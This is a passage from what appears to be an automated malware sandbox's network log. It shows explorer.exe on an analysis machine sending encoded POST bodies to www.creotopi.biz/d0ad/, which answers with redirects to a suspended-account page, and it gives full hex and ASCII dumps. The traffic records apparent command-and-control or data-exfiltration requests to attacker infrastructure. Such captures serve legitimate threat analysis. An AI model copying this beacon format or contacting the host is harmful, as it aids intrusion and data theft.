Oct 26, 2022 13:19:16.082746983 CEST	1491	IN	HTTP/1.1 302 Found Date: Wed, 26 Oct 2022 11:19:15 GMT Server: Apache Location: http://www.creotopi.biz/cgi-sys/suspendedpage.cgi Content-Length: 233 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 72 65 6f 74 6f 70 69 2e 62 69 7a 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.creotopi.biz/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
69	192.168.11.20	49913	162.214.80.106	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:19:18.107727051 CEST	1498	OUT	POST /d0ad/ HTTP/1.1 Host: www.creotopi.biz Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.creotopi.biz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.creotopi.biz/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 31 5f 41 46 77 31 62 33 70 32 4c 69 53 71 62 79 4e 4e 77 67 4d 37 62 4e 70 44 6e 38 37 58 77 4e 44 74 4c 61 75 5a 55 66 30 66 43 57 36 4d 4e 45 35 51 34 5a 39 43 45 50 53 5a 76 6d 78 4c 37 38 7a 55 31 59 53 4a 71 63 75 57 56 4c 4f 36 79 54 63 6f 58 52 50 79 4e 70 4a 61 56 61 64 43 72 79 76 41 42 4d 6e 44 4f 6a 4e 53 32 38 65 6e 49 4d 43 46 76 34 71 53 44 37 5a 63 79 5a 6a 5f 42 44 33 54 79 6f 66 56 39 38 64 70 65 79 34 57 4b 64 73 32 66 6b 57 55 6d 57 58 2d 44 47 59 67 43 74 38 4d 5a 5f 6a 44 59 5f 6f 34 68 78 41 68 57 58 75 47 37 4a 28 70 61 61 4c 32 34 43 6b 2d 43 2d 76 4b 65 45 41 69 77 36 63 78 41 5f 58 69 5a 45 50 64 4d 42 38 30 45 56 30 48 6e 53 56 44 35 66 57 52 5a 56 5a 33 42 57 68 4b 64 36 46 35 69 46 51 68 4e 32 79 72 70 45 4e 43 75 74 79 45 7e 69 6c 4a 50 32 67 46 58 7a 46 6a 51 57 30 58 41 6e 70 2d 38 67 6d 70 58 70 34 72 52 4f 72 47 6d 30 36 45 66 5f 79 6f 4f 4b 37 73 31 4f 41 46 72 37 4b 73 6d 37 7a 47 28 74 59 79 65 30 4a 42 71 48 48 37 6c 34 77 55 76 64 73 43 56 4f 65 58 47 6d 58 34 4d 36 46 45 54 36 49 68 77 41 71 79 6d 53 42 59 75 32 38 4d 36 6a 55 48 79 77 73 53 65 62 4f 35 75 54 78 7a 4c 34 74 72 6d 47 79 42 33 62 57 50 76 4a 7e 53 49 5f 62 48 7a 5a 65 57 6a 6a 52 51 61 51 73 78 62 6d 6a 37 68 46 45 73 36 45 63 33 54 70 36 54 35 72 6d 53 4a 2d 68 62 39 77 5a 61 38 51 52 70 4f 72 5a 58 51 44 5a 63 6a 6c 4e 36 4a 45 73 4c 76 75 62 51 65 71 5a 43 61 34 42 54 5a 44 7e 34 4a 69 32 4b 79 69 72 38 53 54 31 48 79 33 4b 43 36 51 4b 6c 6f 72 7a 43 32 61 4b 7a 75 59 41 55 77 32 78 72 68 5a 57 79 67 45 70 64 61 49 58 70 58 41 58 66 65 49 71 53 77 6f 51 38 76 76 36 59 6c 6f 66 76 64 32 67 64 38 31 68 6a 45 78 49 34 42 4d 61 36 53 62 59 43 52 72 59 2d 76 4b 46 59 45 34 61 56 30 5f 50 75 43 48 78 66 33 59 68 4d 77 48 30 70 46 79 39 51 4a 6b 67 50 7e 6d 47 52 37 35 46 71 42 4b 4f 37 59 49 75 51 62 45 67 4d 53 41 70 36 73 45 7e 54 30 66 61 61 75 2d 64 74 53 66 31 51 45 4d 6d 47 36 54 33 45 49 54 4c 50 58 33 6c 31 43 4a 41 44 35 56 48 59 75 31 53 79 47 34 36 62 56 6b 45 34 76 42 48 37 50 77 74 77 4d 75 42 76 51 58 69 45 50 42 57 2d 66 30 47 55 61 49 69 6b 43 32 4a 6f 48 46 39 36 48 55 74 52 47 52 58 73 38 4e 57 52 30 4b 38 76 45 5a 77 74 4f 30 46 73 5a 58 33 31 33 61 63 79 73 33 61 45 59 6a 43 61 64 34 34 72 38 6c 71 67 45 67 4c 76 71 56 74 4f 66 62 45 75 4a 7a 55 53 6f 65 6a 51 39 74 7a 4c 58 4b 7e 69 75 49 31 6a 65 47 4b 72 71 77 4b 4a 5a 77 37 57 6f 7a 74 65 78 45 79 41 70 68 38 66 41 33 66 6f 28 4e 34 5f 39 52 31 52 58 42 4c 59 50 32 37 71 61 51 4f 4e 70 7a 32 43 56 66 74 32 56 78 75 68 4e 65 48 36 79 6a 59 63 31 42 6c 69 46 51 50 73 34 31 38 43 52 6c 51 58 46 57 6d 77 69 6c 4a 49 71 52 61 42 32 4e 4d 67 6b 58 51 69 4a 4a 74 6a 45 2d 43 48 4f 71 70 6e 36 35 53 64 52 4d 45 43 6e 43 41 6c 67 59 68 77 52 51 66 79 49 58 4a 57 66 4b 55 41 73 56 34 54 79 4c 6c 4d 6f 5f 44 39 7a 2d 6d 77 67 6d 4c 4f 77 66 64 41 46 77 34 42 6a 53 77 4b 68 54 71 66 44 79 41 2d 78 64 47 4c 6d 4a 51 7a 44 62 69 64 69 66 39 6a 74 6b 57 44 59 33 4e 5f 62 4e 4e 6e 47 31 71 51 38 6f 6b 72 7a 31 42 71 56 69 43 74 45 54 41 71 4c 56 46 70 55 56 72 4b 66 46 6b 41 7e 35 28 30 4d 43 46 74 51 45 55 51 37 79 53 55 4d 42 54 43 38 71 63 42 4e 61 66 32 7a 53 5a 58 47 43 6d 78 53 66 33 2d 62 33 6a 64 79 43 72 65 7e 5a 36 46 7a 72 49 4a 57 49 4d 6e 58 4c 42 4d 68 54 59 56 43 2d 52 7a 66 4e 43 2d 59 37 61 31 6a 6b 4a 71 31 37 50 53 4e 69 6d 33 35 76 6c 4b 71 65 50 65 66 52 70 5a 37 4e 33 51 48 49 57 37 42 45 4e 32 76 44 6e 62 43 67 49 64 42 4b 58 79 49 67 56 67 43 79 65 69 7a 4f 6e 5a 48 75 48 4c 5a 34 56 4a 54 46 55 6c 77 6f 73 76 42 42 41 64 32 50 44 33 54 70 30 4c 52 78 6d 59 41 52 4b 41 65 58 51 52 72 61 59 7a 69 69 4e 64 34 47 78 6e 32 41 33 61 65 62 55 75 4d 2d 6b 6b 77 35 65 41 36 32 4e 68 68 41 68 42 41 64 6c 4c 68 34 4a 74 58 75 67 4d 38 31 75 74 31 44 4b 4f 55 74 35 45 4f 73 4c 76 43 53 78 7a 6b 31 56 32 4f 44 31 44 30 4c 75 4d 48 74 6c 5a 66 62 41 72 68 46 6a 4c 7a 58 70 45 78 43 5a 59 51 72 58 68 36 67 66 6a 59 72 4e 42 65 66 43 51 64 45 59 79 57 51 46 70 4c 54 71 41 5a 6d 46 46 66 6c 31 7a 4d 55 49 77 56 54 49 68 63 6e 70 58 69 Data Ascii: jXu=1_AFw1b3p2LiSqbyNNwgM7bNpDn87XwNDtLauZUf0fCW6MNE5Q4Z9CEPSZvmxL78zU1YSJqcuWVLO6yTcoXRPyNpJaVadCryvABMnDOjNS28enIMCFv4qSD7ZcyZj_BD3TyofV98dpey4WKds2fkWUmWX-DGYgCt8MZ_jDY_o4hxAhWXuG7J(paaL24Ck-C-vKeEAiw6cxA_XiZEPdMB80EV0HnSVD5fWRZVZ3BWhKd6F5iFQhN2yrpENCutyE~ilJP2gFXzFjQW0XAnp-8gmpXp4rROrGm06Ef_yoOK7s1OAFr7Ksm7zG(tYye0JBqHH7l4wUvdsCVOeXGmX4M6FET6IhwAqymSBYu28M6jUHywsSebO5uTxzL4trmGyB3bWPvJ~SI_bHzZeWjjRQaQsxbmj7hFEs6Ec3Tp6T5rmSJ-hb9wZa8QRpOrZXQDZcjlN6JEsLvubQeqZCa4BTZD~4Ji2Kyir8ST1Hy3KC6QKlorzC2aKzuYAUw2xrhZWygEpdaIXpXAXfeIqSwoQ8vv6Ylofvd2gd81hjExI4BMa6SbYCRrY-vKFYE4aV0_PuCHxf3YhMwH0pFy9QJkgP~mGR75FqBKO7YIuQbEgMSAp6sE~T0faau-dtSf1QEMmG6T3EITLPX3l1CJAD5VHYu1SyG46bVkE4vBH7PwtwMuBvQXiEPBW-f0GUaIikC2JoHF96HUtRGRXs8NWR0K8vEZwtO0FsZX313acys3aEYjCad44r8lqgEgLvqVtOfbEuJzUSoejQ9tzLXK~iuI1jeGKrqwKJZw7WoztexEyAph8fA3fo(N4_9R1RXBLYP27qaQONpz2CVft2VxuhNeH6yjYc1BliFQPs418CRlQXFWmwilJIqRaB2NMgkXQiJJtjE-CHOqpn65SdRMECnCAlgYhwRQfyIXJWfKUAsV4TyLlMo_D9z-mwgmLOwfdAFw4BjSwKhTqfDyA-xdGLmJQzDbidif9jtkWDY3N_bNNnG1qQ8okrz1BqViCtETAqLVFpUVrKfFkA~5(0MCFtQEUQ7ySUMBTC8qcBNaf2zSZXGCmxSf3-b3jdyCre~Z6FzrIJWIMnXLBMhTYVC-RzfNC-Y7a1jkJq17PSNim35vlKqePefRpZ7N3QHIW7BEN2vDnbCgIdBKXyIgVgCyeizOnZHuHLZ4VJTFUlwosvBBAd2PD3Tp0LRxmYARKAeXQRraYziiNd4Gxn2A3aebUuM-kkw5eA62NhhAhBAdlLh4JtXugM81ut1DKOUt5EOsLvCSxzk1V2OD1D0LuMHtlZfbArhFjLzXpExCZYQrXh6gfjYrNBefCQdEYyWQFpLTqAZmFFfl1zMUIwVTIhcnpXijFTizjEuM(le2w_G5jCAzQWgrsS8-61nNO_YxIqvLsnV5BJx9mN47XjTPHnVScWeZ4OiI8JETt3koPHR5GMEPCZLNNmENXR351iJcg_s8(SJZfvvtBs~5BrRgJ-K8P6ZF(EkjA5k9aztaXfnpcsAILsqwxOMn40Oir-uIy1He02QVmKPeVIhW1j9A81iOKr0SVi4HPM3lBtbg04jXkPfodJJjQlaIBlVFR1526vHul2i2fMuIwv00hqp4hCA0Ln1TMBMrDfNbSKRHFj5kurxVRPvvgDuzny3KFQC2fnODWsAhFGf-Rqve01tcydLyIRycKD0TO2wtHnTci1OleQ0DDQ9q4KuiehJ7KOn2AA(tLxZxdbgxq0~WjUwXYnhKoK9ub58k2O6DhHnhKRf9TyphCk(EnsYLDDntHa5P9v4qEA7Nq7jBSZH0eNXnjH4WRIdQd_08Ohxcj_YX2WiVxMStMoIQYdv6v-zm(eaX9G7mf_IhkmOiPFg-6245Mqajwvt3aMKp4KUEEQT10viJGhN1F6Pme-ZV8vP0YKv5(ISwL-1uescJHKHElz5niiddTI1_XKVhOF8qtF3xWLhZIKczHyCiLF9v1VQv23FwhBKhKYP8iYsBjPCo6NWYhfQa7exdHjF4EoCd~tmC3PYowDKq(RskEhKvPNqeZ61kyBxCIseK3jTaAQfWMqIjhnLV9OMVcHNHbjU3K-CCDuJY6i3IBQp3xwQdhgGtuZNmm0HSrkg6rkaU7-5ROkYpOPqYQY(-GCShMcAJOBdMCPEKRZpxxH8E49hDV9GcYwFY2PnderDTPj0-iGcZlQ0VWxljnP42aB(9UrqanM1td_jei3H7efZ3tTOKLIAh01IQ2dhDAKL7ePnJKrGw9OePbP7ldZfdmuzjwtfJsPuj0EEAjkMhc2fkJERA8BU9vbIpgplHLz2M3bcR(Ee4ISWZecxIkaP2VbxZE6~tGJhN733zYdT4jv3puEuDabonQd3GjtAk8YHjXpYD~r3aVscVbEj8Gg3xI0iMN3lyCuuQkoZvkHE6LBE-5K~XTk2apaeumo87oBQAOlrcTVgbcZI30pC4SJjh8FvdGqD2PATZehWQrx~Q(sDq6v(YmDO7KhZUbGRfZV2vnpSXi3sj1eD9JDDJQkruZ4kLp3MhbT4F(dPBJcAOa2J9Yee8c39kzBloGPmvN5h2dJRnEJE7nGD0uf3jQa7XppmRozqGA51p5o0pTiY9osrAqPuATYKxLgNaPY4nTo(OPGg8MlG1XvVfpCVfkOy4YzLOQ8ObKnWBsHQHUmnOx6HKUBv49VXqERFqCeFThSuumQiTCVkYmQsWKoXahQxiZfpq0TiffaEDGRZRgRqSUbG2q6nsbKiwEvOMpOretijkv4lvckbRBiE00CeBHWpoEJQVjYUtT1a2ZNbTjTm4W7h8xjG6CnJ8sazq28lJ(QGJPoXwMFlE1dWmF3jqWFy8vQEEbunOXADDk6zolR9OrL0GZP4jNtNHzM60But3(rLNS-3LMdZ5hS~Vg-cwqH6R7Wq6R9hXNeluHrnj6xWyjb3P9dVygpS66gRTStBB32FREMCzZW1AX3xDKqzKiObLWb2zzFJSnSEK5aKF2mmaT8ydx6O-Gtxqn4NkJp1wrIRRfq52tZHJ9spQmvuF0vtuYpHMeOtRmOpTUWNkM_MNpzagvEijQp851VS5H8x0y-Sy6-F6Ru~aXLG_7QyHRTN95zlky3YjQFbEHT8fIYicwmzDQfkoyCZjQbPVQc7a1KUv6yEqsgNp22dbrV9XnO29j7hTpGD2odwqWunl8oldhfR1eIfe(36r9mcFZeAlhArB0s5DeiYoXvM9y3p6SXdWKkgkxFuH80~dlCt8Tok0V6im088x6shfUn3zUdjJnsxLB1fDJjWJ(XihAh3YJoQbQK2UA_28614D4htP~vRefuenLFo0dniiDiHV(CGFYKEEnY4weopuPwqFVaxyOK86sBX9YyEhiiOBjcfS6D~nsg1daKxcZh6BH-BGFg2X1fh9i4UnBbmfkp61JFc90Pol9VUBD_x0nCylpb67hqQy~YIGAdqcBRrVmgUIBbkYIv9fLwGyI4xRIb8clo6DfdM9NEA0Ai6c9jx8mUDfYp5Z(1Ep~VrAcFLfK6ZQQkBz2YyU8TlD(_Q626uIRMDWGaiO4TgWNX9XD_JYBGdo93XmJAo7zfOh0SCAi1XR(VRKthXxNHL1S3SR6YEozfAsjVR53z4IF_dh4K(quEQ1cFjN2X5oJuwyEeB6lL5gF7CoTTVNjIfl9cUDgONshBZYKUOpNcMIKXszXNUQty2QD_vrNe3QEySyIcWBgCV-L2DQdyeZ8oHRRr5zwGhspK4WacV9ZUOhTRf1qV(ik03d(09FGlTv5o0P4mcPEZbwWrnr04YINP7kVnrG2ew8RGLZLyR4Y9Nei30sycwqLXLGwCYBP_Q25H6gdpnsdczE16hWLVeuO93USCeWOPE19HwiyRqqVJGhnwnG~nSucbV1OLuJQf9-rcBu85T9ibIznMBycSuhzac11s2pCr(GlYFgOgCXoIghUiVtBLW_0pndhqGNcbp5uzvBpmdapuY2S1mIoaZfA5rQ4Ivouy(u0H9xWuxF(TMkWkgFfb04HncuUoHfhrY0pvc67SN14ov50FOlX9PkX6akOMYLsH3ekPTrIHc54R4xtiQMyeriOHG8qQEiSkExClw9Z4oEbL
Oct 26, 2022 13:19:18.107819080 CEST	1504	OUT	Data Raw: 6b 67 70 69 54 79 43 33 61 68 51 4b 35 44 69 4a 36 43 46 5f 55 32 44 4a 62 36 56 58 52 4a 76 53 44 4d 68 6c 5a 57 4e 6f 54 54 6f 2d 6a 45 5a 78 6f 31 59 31 7a 7a 49 78 4a 4e 6d 48 34 66 70 41 6b 4c 4e 54 46 41 64 62 75 44 77 64 38 2d 4d 6b 30 71 Data Ascii: kgpiTyC3ahQK5DiJ6CF_U2DJb6VXRJvSDMhlZWNoTTo-jEZxo1Y1zzIxJNmH4fpAkLNTFAdbuDwd8-Mk0qEfb8XXi0VfFlxufifcUaNU0WEvFYbfc0bf82H-R2AC7-8046n-CcN0Guj1mXaEiIX_c5YTXc8GHpAG0ZqwvV(5mMZ96qYPzdqMTsgZyFBpBijJARfy1TVlRxOBWURc8ZoXCvVTouU1k2cM0MQybXgea45YV8LpS3h
Oct 26, 2022 13:19:18.301145077 CEST	1506	OUT	Data Raw: 38 73 68 30 73 36 63 76 38 70 50 76 72 50 61 79 58 36 45 4b 36 52 6d 53 39 48 5a 67 59 62 50 43 72 6c 38 41 57 67 33 4f 46 55 55 5f 51 77 62 71 77 73 35 4f 37 67 4c 76 47 73 71 50 4d 44 57 37 4c 43 65 46 31 42 32 65 38 5f 41 79 47 69 44 2d 4f 50 Data Ascii: 8sh0s6cv8pPvrPayX6EK6RmS9HZgYbPCrl8AWg3OFUU_Qwbqws5O7gLvGsqPMDW7LCeF1B2e8_AyGiD-OPSk9utFL-cMloISPc6BZ5Ukyxxe7LUIUkbkpK0t6EHKBPmtqQERLZbVqZFg0NcpUD7Re3NllwMb5V3Xj-f4XGcdM_sYDbQK9JM8~4Rt6iT7vB2-bNgSKvkpoFR194A9ohtWpGuPhYbWAnwy7psGB6akL4DKFnDkpor
Oct 26, 2022 13:19:18.301222086 CEST	1507	OUT	Data Raw: 7e 62 6f 59 69 55 51 6f 57 6b 75 53 44 6e 46 55 53 41 42 47 44 4c 37 53 6a 4b 64 78 34 58 28 5a 67 66 6b 44 5a 45 46 4d 44 69 4e 4b 62 5f 41 73 61 72 47 68 66 44 48 4e 6e 6d 69 4b 6c 76 6c 65 4f 6c 38 39 47 32 61 62 67 6c 30 31 72 74 62 30 50 42 Data Ascii: ~boYiUQoWkuSDnFUSABGDL7SjKdx4X(ZgfkDZEFMDiNKb_AsarGhfDHNnmiKlvleOl89G2abgl01rtb0PBNduL8Yha1BgqMYvaCAhOhXy4L-ci4jOdwZ8314ML9yF-QXsc2oRiOn1iVE6XpLUtA3JkfK3QmX5Qn_b1zLxdWpulvwaNU9inf1CMZDUkw4iCkkUPnY(nCLO2uOnFqj1kOjz6h1vW2JeuAjTeQ_YYsXke2lpBBMXMm
Oct 26, 2022 13:19:18.301454067 CEST	1515	OUT	Data Raw: 7e 52 64 34 36 38 71 67 48 78 67 4a 70 31 4a 71 70 71 44 33 34 51 52 6a 37 76 62 7a 59 71 61 52 64 4e 4d 74 6e 37 46 74 30 57 59 6c 48 43 57 34 47 76 59 71 72 79 46 7a 42 53 41 36 74 73 57 57 33 5f 34 39 30 64 64 32 43 6a 34 61 47 30 4b 6a 71 51 Data Ascii: ~Rd468qgHxgJp1JqpqD34QRj7vbzYqaRdNMtn7Ft0WYlHCW4GvYqryFzBSA6tsWW3_490dd2Cj4aG0KjqQnubCW0oougm7zwUP00e7QoAgRAONRWPp8v4KZ3FGePOPV_AfzCqHPSVHVCrqQPXWC3FfDsP2IJ(Caau5Pcujb7IJg6LLvgWnbGpSfOe9eCYshWehVl(tgZM1sfP4e3rf9vHJFKJPNF4baQxUlI21A89nQSyDtsLXn
Oct 26, 2022 13:19:18.301574945 CEST	1516	OUT	Data Raw: 49 39 76 4e 70 35 48 62 36 34 42 71 45 77 45 47 30 58 44 78 76 48 4c 42 30 51 4c 4e 75 68 36 43 50 56 44 6a 67 65 7e 2d 43 4e 48 72 59 34 6c 6f 53 57 65 67 71 62 48 7a 64 69 54 32 4f 64 44 30 31 73 41 33 56 31 73 52 39 59 79 6c 52 63 43 67 6e 6a Data Ascii: I9vNp5Hb64BqEwEG0XDxvHLB0QLNuh6CPVDjge~-CNHrY4loSWegqbHzdiT2OdD01sA3V1sR9YylRcCgnjxxZUqgNjkjxRKRxfRMxjvNh3oqORm3Zl6sKr3FIpgxMC6mEzJGDtdZlc3VOkcuoYeQnVfHxa9YyPXfdllM7-7JWc5cInKUO_2OlhP2gQI8r-4L8erL~wxTtdMGRDetVjRDwFYLvSC67M81MQZnFn1oy4bFc-3CNWP
Oct 26, 2022 13:19:18.301745892 CEST	1520	OUT	Data Raw: 34 48 67 49 58 52 33 30 45 4a 6d 43 63 77 75 55 73 45 75 73 41 55 41 30 5a 6a 37 47 45 5f 61 49 44 68 57 36 36 59 42 44 57 34 6d 59 34 46 55 76 42 33 52 54 48 48 69 43 7a 4a 6a 67 6c 77 52 70 64 2d 4d 69 52 62 48 4a 57 61 66 6d 33 31 68 37 72 46 Data Ascii: 4HgIXR30EJmCcwuUsEusAUA0Zj7GE_aIDhW66YBDW4mY4FUvB3RTHHiCzJjglwRpd-MiRbHJWafm31h7rFV4DntfqGivF6cMArU8x5A5kzv-aqe2BajDp3ZmswGXLMaR(G70JRJir7c1BY00Me4rlS2u4fbijxe7t3nXKQW60Q(RozE88R~i5tiJUuTn0FzD~jAYMaixZuhv(Q8WrjdBvMHtry2_nABm(ww5VT0P400z(LxLPgk
Oct 26, 2022 13:19:18.301913977 CEST	1522	OUT	Data Raw: 44 51 36 42 5a 47 48 5a 49 35 38 5a 32 4e 6e 42 70 70 72 71 7a 35 52 58 43 41 47 45 72 39 31 53 67 57 32 4b 56 7a 62 77 50 5a 42 70 76 64 63 69 34 65 58 45 6e 69 68 47 6b 55 67 68 64 45 62 63 32 51 65 54 32 57 4d 67 6c 5a 77 31 63 73 6a 6e 43 6c Data Ascii: DQ6BZGHZI58Z2NnBpprqz5RXCAGEr91SgW2KVzbwPZBpvdci4eXEnihGkUghdEbc2QeT2WMglZw1csjnCl5bG8CivFRZlNi5WIB5KwxqciodePIrBKjs4KgTXKbV3YyUFmyFnG5yxbEKgatFnBawJFsz3EVuiGEFt5EWLUuKvQO0PWzOIBtmnkHvgapLIpZgZmsGkTdfSvVk1Dm5Qq9dLsNGv7XW3Gqc7t3CilgbDaGP4Qyj1iU
Oct 26, 2022 13:19:18.302084923 CEST	1525	OUT	Data Raw: 75 6e 6b 4b 69 75 64 57 42 76 62 39 4f 72 41 55 49 49 68 6b 6b 49 64 4a 62 5f 4f 57 35 30 6e 55 74 6a 39 70 6e 56 32 39 65 47 4a 34 57 75 43 43 38 2d 59 33 44 6e 4f 6f 43 43 72 55 38 77 53 72 6e 32 4d 7a 52 35 33 33 68 41 72 56 66 61 41 65 57 70 Data Ascii: unkKiudWBvb9OrAUIIhkkIdJb_OW50nUtj9pnV29eGJ4WuCC8-Y3DnOoCCrU8wSrn2MzR533hArVfaAeWpuoULVpqH3HL3qY3jEQjWIeSXGS78O6i83CZU58FoSibWUBrXpWXunKeqz8EQvWpFwa4NQ1fZw8GpjrGg1v0FUVsbfm01p_VikmjBLHJoeWI2UJHuD8u4axVFQjBQuqAYQD7_pbywQxvt0vvYxnqM~RmD4RPD1a4US
Oct 26, 2022 13:19:18.302253962 CEST	1531	OUT	Data Raw: 34 6d 6f 66 73 34 48 43 4c 7a 33 39 59 36 7e 41 34 6c 6f 32 72 44 36 61 37 47 28 63 4f 42 52 41 6b 64 36 76 74 57 75 37 66 55 67 56 6f 48 48 61 4b 52 4c 6a 4c 73 34 37 35 44 65 4d 30 50 61 31 47 53 35 4b 6a 4d 53 75 36 4f 72 74 75 34 48 5a 48 39 Data Ascii: 4mofs4HCLz39Y6~A4lo2rD6a7G(cOBRAkd6vtWu7fUgVoHHaKRLjLs475DeM0Pa1GS5KjMSu6Ortu4HZH9BFJi1Xf4gH(7OKthXtMPa9l_4K5JtgYsX1zkGietaGR9R2jihhFHhBrhVFRsb8g-Et6yJHLSePMZguqg~0HtqOztabqxhRanOyJ3eHMJ7UzRoeIHraCA1QnzcayiutkPa9(1pqRbh1j0nKyMC4EiimKwEIfwX5UUA
Oct 26, 2022 13:19:18.494621038 CEST	1533	OUT	Data Raw: 66 30 6f 49 43 69 67 46 44 4f 59 74 35 47 55 54 43 62 56 73 68 6d 51 77 7a 30 6a 4a 57 66 31 76 57 69 72 66 58 51 62 36 67 5f 58 76 35 59 42 32 79 45 7e 33 35 54 33 45 77 58 70 45 66 63 4e 6d 6d 43 63 6f 78 4d 41 7a 76 31 37 42 44 48 5a 32 43 4a Data Ascii: f0oICigFDOYt5GUTCbVshmQwz0jJWf1vWirfXQb6g_Xv5YB2yE~35T3EwXpEfcNmmCcoxMAzv17BDHZ2CJA7lSvCpYdw3AbAwQFPKxxkTU7SuMU9WPUL4fOmfGx2A0KEjQg0HsVh7t~Z8BRo~ngqejDidA0Vb0mbTJ5iHI7_3erSTB69U19yclSm~Q7Ncyk9iicPUcWFXcF58_Hnzwjlj3uUNtXcUuBLnav_JGqohlkkplW6pR6
Oct 26, 2022 13:19:18.689613104 CEST	1546	IN	HTTP/1.1 302 Found Date: Wed, 26 Oct 2022 11:19:18 GMT Server: Apache Location: http://www.creotopi.biz/cgi-sys/suspendedpage.cgi Content-Length: 233 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 72 65 6f 74 6f 70 69 2e 62 69 7a 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.creotopi.biz/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.11.20	49851	162.214.80.106	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:15:52.372186899 CEST	389	OUT	POST /d0ad/ HTTP/1.1 Host: www.creotopi.biz Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.creotopi.biz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.creotopi.biz/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 31 5f 41 46 77 31 62 33 70 32 4c 69 53 71 62 79 4e 4e 77 67 4d 37 62 4e 70 44 6e 38 37 58 77 4e 44 74 4c 61 75 5a 55 66 30 66 4b 57 36 2d 46 45 35 78 34 5a 36 43 45 50 52 5a 76 6a 78 4c 37 68 7a 56 64 63 53 49 57 71 75 54 52 4c 4e 70 4b 54 64 62 28 52 4b 79 4e 53 58 4b 56 59 5a 43 72 6d 76 41 46 51 6e 44 4b 5a 4e 68 71 38 45 6e 34 4d 47 30 76 33 31 79 44 39 5a 63 79 72 6e 5f 41 70 33 54 32 34 66 56 35 38 64 76 65 79 35 6b 43 64 75 6c 48 6b 52 45 6d 56 64 65 44 56 54 41 44 54 38 4d 39 72 6a 44 5a 43 6f 39 42 78 41 6a 65 58 76 46 53 66 7e 4a 61 61 4b 32 34 42 75 65 66 35 76 4b 54 42 41 6d 34 36 63 32 45 5f 57 43 5a 45 4c 35 59 47 73 45 45 54 7e 6e 6d 45 52 44 38 51 57 52 4e 72 5a 7a 52 57 68 61 35 36 45 4b 61 46 41 77 4e 32 28 72 70 43 43 69 75 45 72 30 28 6a 6c 4a 66 4d 67 42 6a 6a 46 6b 6f 57 31 32 67 6e 72 66 38 6e 76 70 58 76 30 4c 52 58 39 47 72 67 36 45 50 6a 79 6f 4f 61 37 74 68 4f 42 32 7a 37 4c 70 53 34 79 32 28 75 4d 43 66 75 66 78 32 33 48 37 35 4f 77 55 58 4e 73 42 35 4f 45 33 47 6d 53 62 30 35 50 30 54 39 44 42 77 65 33 43 6d 42 42 59 53 62 38 4f 58 59 55 32 65 77 75 69 75 62 5a 35 75 63 68 44 4c 6b 6a 4c 6e 4d 34 52 33 62 57 50 6a 33 7e 53 55 5f 62 58 4c 5a 45 41 54 6a 56 43 79 51 71 78 61 6a 6a 37 68 59 45 73 48 36 63 33 72 32 36 51 77 4f 6d 51 6c 2d 68 4a 56 77 63 59 45 52 58 5a 4f 71 62 6e 51 55 58 38 76 79 4e 36 56 4d 73 4b 66 2d 59 6a 71 71 4c 57 36 34 46 54 5a 43 37 59 4a 68 6d 61 79 77 68 63 66 4d 31 47 61 6e 4b 43 65 41 4b 6e 34 72 7a 6b 6a 39 56 7a 7e 4d 53 47 35 65 32 2d 64 57 66 41 41 76 39 